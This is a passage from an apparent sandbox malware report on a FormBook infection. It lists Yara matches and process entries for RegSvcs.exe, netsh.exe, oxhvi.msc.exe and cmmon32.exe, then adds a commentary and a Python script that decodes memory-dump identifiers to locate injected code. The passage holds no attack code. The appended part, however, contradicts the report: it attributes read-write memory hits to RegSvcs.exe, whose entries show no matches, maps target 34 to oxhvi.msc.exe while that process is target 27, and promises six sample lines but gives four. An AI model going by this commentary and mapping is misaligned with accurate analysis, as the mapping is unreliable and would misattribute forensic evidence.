• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000003.1785169179.0000000000D7D000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000003.1785169179.0000000000D7D000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000003.1785668153.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000003.1785668153.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000003.1785668153.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000003.1785668153.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000003.1785668153.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000003.1778617142.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000003.1778617142.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000003.1778617142.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000003.1778617142.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000003.1778617142.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000003.1784873248.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000003.1784873248.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000003.1784873248.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000003.1784873248.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000003.1784873248.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000003.1779404808.0000000000E42000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000003.1779404808.0000000000E42000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000003.1779404808.0000000000E42000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000003.1779404808.0000000000E42000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000003.1779404808.0000000000E42000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000003.1778666606.0000000000E06000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000003.1778666606.0000000000E06000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000003.1778666606.0000000000E06000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000003.1778666606.0000000000E06000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000003.1778666606.0000000000E06000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000003.1785086182.0000000000E37000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000003.1785086182.0000000000E37000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000003.1785086182.0000000000E37000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000003.1785086182.0000000000E37000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000003.1785086182.0000000000E37000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    Antivirus matches:
                                                                                                                                                    • Detection: 0%, ReversingLabs
                                                                                                                                                    Has exited:true

Target ID:23
Start time:09:57:44
Start date:05/11/2024
Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
Imagebase:0xbc0000
File size:45'984 bytes
MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:24
Start time:09:57:44
Start date:05/11/2024
Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
Imagebase:0xb90000
File size:45'984 bytes
MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:25
Start time:09:57:45
Start date:05/11/2024
Path:C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\SysWOW64\netsh.exe"
Imagebase:0x15c0000
File size:82'432 bytes
MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000019.00000002.1824428727.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000019.00000002.1824428727.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000019.00000002.1824428727.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000019.00000002.1824428727.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000019.00000002.1824428727.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Has exited:true

Target ID:26
Start time:09:57:45
Start date:05/11/2024
Path:C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\SysWOW64\netsh.exe"
Imagebase:0x15c0000
File size:82'432 bytes
MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001A.00000002.1823176871.0000000000FC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001A.00000002.1823176871.0000000000FC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001A.00000002.1823176871.0000000000FC0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001A.00000002.1823176871.0000000000FC0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000001A.00000002.1823176871.0000000000FC0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Has exited:true

Target ID:27
Start time:09:57:50
Start date:05/11/2024
Path:C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\qbmt\OXHVIM~1.EXE" C:\Users\user\AppData\Local\Temp\qbmt\BVQMCW~1.DOC
Imagebase:0x290000
File size:947'288 bytes
MD5 hash:0ADB9B817F1DF7807576C2D7068DD931
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000003.1914895579.0000000001A12000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001B.00000003.1914895579.0000000001A12000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001B.00000003.1914895579.0000000001A12000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001B.00000003.1914895579.0000000001A12000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000003.1914895579.0000000001A12000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000003.1917625527.00000000019DF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001B.00000003.1917625527.00000000019DF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001B.00000003.1917625527.00000000019DF000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001B.00000003.1917625527.00000000019DF000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000003.1917625527.00000000019DF000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000003.1913572826.00000000019E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001B.00000003.1913572826.00000000019E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001B.00000003.1913572826.00000000019E0000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001B.00000003.1913572826.00000000019E0000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000003.1913572826.00000000019E0000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000003.1916791732.00000000019B2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001B.00000003.1916791732.00000000019B2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001B.00000003.1916791732.00000000019B2000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001B.00000003.1916791732.00000000019B2000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000003.1916791732.00000000019B2000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000003.1913693018.0000000001A3C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001B.00000003.1913693018.0000000001A3C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001B.00000003.1913693018.0000000001A3C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001B.00000003.1913693018.0000000001A3C000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000003.1913693018.0000000001A3C000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000003.1914595785.0000000001A11000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001B.00000003.1914595785.0000000001A11000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001B.00000003.1914595785.0000000001A11000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001B.00000003.1914595785.0000000001A11000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000003.1914595785.0000000001A11000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000003.1914843943.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001B.00000003.1914843943.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001B.00000003.1914843943.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001B.00000003.1914843943.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000003.1914843943.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000003.1917367387.00000000042CA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001B.00000003.1917367387.00000000042CA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001B.00000003.1917367387.00000000042CA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001B.00000003.1917367387.00000000042CA000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000003.1917367387.00000000042CA000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000003.1914324145.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001B.00000003.1914324145.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001B.00000003.1914324145.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001B.00000003.1914324145.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000003.1914324145.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000003.1913627559.0000000001A0E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001B.00000003.1913627559.0000000001A0E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001B.00000003.1913627559.0000000001A0E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001B.00000003.1913627559.0000000001A0E000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000003.1913627559.0000000001A0E000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:30
                                                                                                                                                    Start time:09:57:57
                                                                                                                                                    Start date:05/11/2024
                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
                                                                                                                                                    Imagebase:0xdc0000
                                                                                                                                                    File size:45'984 bytes
                                                                                                                                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:31
                                                                                                                                                    Start time:09:57:58
                                                                                                                                                    Start date:05/11/2024
                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
                                                                                                                                                    Imagebase:0xe50000
                                                                                                                                                    File size:45'984 bytes
                                                                                                                                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:32
                                                                                                                                                    Start time:09:57:58
                                                                                                                                                    Start date:05/11/2024
                                                                                                                                                    Path:C:\Windows\SysWOW64\cmmon32.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Windows\SysWOW64\cmmon32.exe"
                                                                                                                                                    Imagebase:0x790000
                                                                                                                                                    File size:36'352 bytes
                                                                                                                                                    MD5 hash:DEC326E5B4D23503EA5176878DDDB683
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000020.00000002.1954404710.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000020.00000002.1954404710.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000020.00000002.1954404710.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000020.00000002.1954404710.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000020.00000002.1954404710.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:33
                                                                                                                                                    Start time:09:57:58
                                                                                                                                                    Start date:05/11/2024
                                                                                                                                                    Path:C:\Windows\SysWOW64\cmmon32.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Windows\SysWOW64\cmmon32.exe"
                                                                                                                                                    Imagebase:0x790000
                                                                                                                                                    File size:36'352 bytes
                                                                                                                                                    MD5 hash:DEC326E5B4D23503EA5176878DDDB683
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000021.00000002.1954501729.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000021.00000002.1954501729.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000021.00000002.1954501729.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000021.00000002.1954501729.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000021.00000002.1954501729.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    Has exited:true
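
The Yara matches listed for these processes are reported against Joe Sandbox memory-dump identifiers (the `.sdmp` names in each `Source:` field), and the useful forensic signal is in those identifiers: for the two `cmmon32.exe` targets the matches sit in executable, non-image memory at `0x510000` and `0x29D0000`, which is the footprint of the process-hollowing and mapped-section injection the report flags, whereas the earlier `RegSvcs.exe`-era hits are in read-write private memory. The following Python is an added example, not part of this report or of any Joe Security tooling. It decodes the identifiers, groups the rules per region, and picks out the regions a responder would pull first. Assumptions: the field layout (target ID, stage, timestamp, base address, page protection, a field of unconfirmed meaning, memory type, another unconfirmed field) is inferred from how the identifiers in this report decompose and from their agreement with the `Target ID:` values and the `winnt.h` constants; the function names, the `DumpRegion` type and the `PROCESS_PATHS` lookup are mine; the six sample lines are copied from the matches in this report.

```python
"""Decode the .sdmp dump identifiers Joe Sandbox attaches to Yara matches and
summarise which process memory regions carried the FormBook hits.

Added example, not code from the Joe Sandbox report or from Joe Security.
ASSUMED field layout, inferred from the identifiers in this report:
  <target>.<stage>.<timestamp>.<base>.<protect>.<unknown>.<memtype>.<unknown>.sdmp
Fields 6 and 8 are ignored because their meaning is not confirmed.
"""
import re
from collections import defaultdict
from dataclasses import dataclass

# PAGE_* protection and MEM_* type constants from winnt.h
PAGE_FLAGS = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}
MEM_TYPES = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Target ID -> image path, copied from the process entries in this report.
# Target IDs are decimal in the report and hexadecimal in the identifier.
PROCESS_PATHS = {
    30: r"C:\Users\user\AppData\Local\Temp\RegSvcs.exe",
    31: r"C:\Users\user\AppData\Local\Temp\RegSvcs.exe",
    32: r"C:\Windows\SysWOW64\cmmon32.exe",
    33: r"C:\Windows\SysWOW64\cmmon32.exe",
    34: r"C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe",
}


@dataclass(frozen=True)
class DumpRegion:
    target_id: int
    stage: int
    base: int
    protect: int
    mem_type: int

    @property
    def protect_name(self):
        return PAGE_FLAGS.get(self.protect & 0xFF, hex(self.protect))

    @property
    def mem_type_name(self):
        return MEM_TYPES.get(self.mem_type, hex(self.mem_type))

    @property
    def is_executable_non_image(self):
        # Executable pages not backed by a loaded image: code placed there by
        # WriteProcessMemory / NtMapViewOfSection rather than by the loader.
        return (self.protect & 0xFF) in EXECUTABLE and self.mem_type != 0x1000000

    @property
    def process(self):
        return PROCESS_PATHS.get(self.target_id, f"<target {self.target_id} not in this excerpt>")


def parse_sdmp(name: str) -> DumpRegion:
    parts = name.split(".")
    if len(parts) != 9 or parts[-1] != "sdmp":
        raise ValueError(f"not a Joe Sandbox dump identifier: {name}")
    f = [int(p, 16) for p in parts[:8]]
    return DumpRegion(target_id=f[0], stage=f[1], base=f[3], protect=f[4], mem_type=f[6])


LINE_RE = re.compile(
    r"Rule:\s*(?P<rule>[^,]+),.*?Source:\s*(?P<src>\S+?\.sdmp),\s*Author:\s*(?P<author>.*)$"
)


def parse_yara_lines(text: str):
    """Return (rule, region, author) for every 'Rule: ..., Source: ....sdmp' line."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            hits.append((m["rule"].strip(), parse_sdmp(m["src"]), m["author"].strip()))
    return hits


def rules_per_region(hits):
    grouped = defaultdict(set)
    for rule, region, _ in hits:
        grouped[region].add(rule)
    return dict(grouped)


def injected_code_regions(hits):
    """Regions worth pulling first: executable, non-image memory with a match."""
    return sorted({r for _, r, _ in hits if r.is_executable_non_image},
                  key=lambda r: (r.target_id, r.base))


# Six match lines copied verbatim from this report (targets 0x1B, 0x20, 0x21, 0x22).
SAMPLE_REPORT_LINES = """\
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000003.1917625527.00000000019DF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000003.1917625527.00000000019DF000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000020.00000002.1954404710.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000020.00000002.1954404710.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
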